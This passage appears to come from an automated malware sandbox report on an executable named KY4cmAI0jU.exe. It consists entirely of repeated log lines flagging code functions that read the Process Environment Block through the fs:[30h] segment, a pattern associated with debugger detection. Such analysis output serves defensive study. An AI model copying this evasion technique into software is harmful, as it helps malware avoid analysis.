          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]1_2_00AF002D
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]1_2_00ADB02A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]1_2_00AEA830
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]1_2_00AEA830
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]1_2_00AEA830
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA830 mov eax, dword ptr fs:[00000030h]1_2_00AEA830
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]1_2_00B47016
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]1_2_00B47016
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]1_2_00B47016
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]1_2_00B94015
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]1_2_00B94015
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82073 mov eax, dword ptr fs:[00000030h]1_2_00B82073
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B91074 mov eax, dword ptr fs:[00000030h]1_2_00B91074
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]1_2_00AE0050
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]1_2_00AE0050
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]1_2_00B451BE
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]1_2_00AF61A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]1_2_00AF61A0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov ecx, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE99BF mov eax, dword ptr fs:[00000030h]1_2_00AE99BF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B469A6 mov eax, dword ptr fs:[00000030h]1_2_00B469A6
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]1_2_00B849A4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]1_2_00B849A4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]1_2_00B849A4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B849A4 mov eax, dword ptr fs:[00000030h]1_2_00B849A4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA185 mov eax, dword ptr fs:[00000030h]1_2_00AFA185
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC182 mov eax, dword ptr fs:[00000030h]1_2_00AEC182
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2990 mov eax, dword ptr fs:[00000030h]1_2_00AF2990
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ACB1E1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ACB1E1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ACB1E1
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B541E8 mov eax, dword ptr fs:[00000030h]1_2_00B541E8
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE4120 mov ecx, dword ptr fs:[00000030h]1_2_00AE4120
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]1_2_00AF513A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]1_2_00AF513A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]1_2_00AC9100
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]1_2_00AC9100
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]1_2_00AC9100
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC962 mov eax, dword ptr fs:[00000030h]1_2_00ACC962
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]1_2_00ACB171
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]1_2_00ACB171
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]1_2_00AEB944
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]1_2_00AEB944
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]1_2_00AC52A5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]1_2_00ADAAB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]1_2_00ADAAB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFAB0 mov eax, dword ptr fs:[00000030h]1_2_00AFFAB0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]1_2_00AFD294
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]1_2_00AFD294
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2AE4 mov eax, dword ptr fs:[00000030h]1_2_00AF2AE4
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84AEF mov eax, dword ptr fs:[00000030h]1_2_00B84AEF
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2ACB mov eax, dword ptr fs:[00000030h]1_2_00AF2ACB
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA229 mov eax, dword ptr fs:[00000030h]1_2_00AEA229
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB236 mov eax, dword ptr fs:[00000030h]1_2_00AEB236
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]1_2_00B04A2C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]1_2_00B04A2C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD8A0A mov eax, dword ptr fs:[00000030h]1_2_00AD8A0A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]1_2_00B8AA16
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]1_2_00B8AA16
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE3A1C mov eax, dword ptr fs:[00000030h]1_2_00AE3A1C
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]1_2_00ACAA16
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov ecx, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B0927A mov eax, dword ptr fs:[00000030h]1_2_00B0927A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]1_2_00B7B260
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]1_2_00B7B260
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98A62 mov eax, dword ptr fs:[00000030h]1_2_00B98A62
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B54257 mov eax, dword ptr fs:[00000030h]1_2_00B54257
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8EA55 mov eax, dword ptr fs:[00000030h]1_2_00B8EA55
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]1_2_00AF4BAD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]1_2_00AF4BAD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]1_2_00AF4BAD
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B95BA5 mov eax, dword ptr fs:[00000030h]1_2_00B95BA5
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]1_2_00AD1B8F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]1_2_00AD1B8F
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]1_2_00AF138B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]1_2_00AF138B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF138B mov eax, dword ptr fs:[00000030h]1_2_00AF138B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8138A mov eax, dword ptr fs:[00000030h]1_2_00B8138A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7D380 mov ecx, dword ptr fs:[00000030h]1_2_00B7D380
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2397 mov eax, dword ptr fs:[00000030h]1_2_00AF2397
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFB390 mov eax, dword ptr fs:[00000030h]1_2_00AFB390
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEDBE9 mov eax, dword ptr fs:[00000030h]1_2_00AEDBE9
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov ecx, dword ptr fs:[00000030h]1_2_00B723E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov ecx, dword ptr fs:[00000030h]1_2_00B723E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B723E3 mov eax, dword ptr fs:[00000030h]1_2_00B723E3
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]1_2_00B453CA
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]1_2_00B453CA
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8131B mov eax, dword ptr fs:[00000030h]1_2_00B8131B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEA309 mov eax, dword ptr fs:[00000030h]1_2_00AEA309
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACDB60 mov ecx, dword ptr fs:[00000030h]1_2_00ACDB60
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]1_2_00AF3B7A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]1_2_00AF3B7A
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98B58 mov eax, dword ptr fs:[00000030h]1_2_00B98B58
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACDB40 mov eax, dword ptr fs:[00000030h]1_2_00ACDB40
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACF358 mov eax, dword ptr fs:[00000030h]1_2_00ACF358
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B84496 mov eax, dword ptr fs:[00000030h]1_2_00B84496
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD849B mov eax, dword ptr fs:[00000030h]1_2_00AD849B
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B814FB mov eax, dword ptr fs:[00000030h]1_2_00B814FB
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]1_2_00B46CF0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]1_2_00B46CF0
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]1_2_00B46CF0
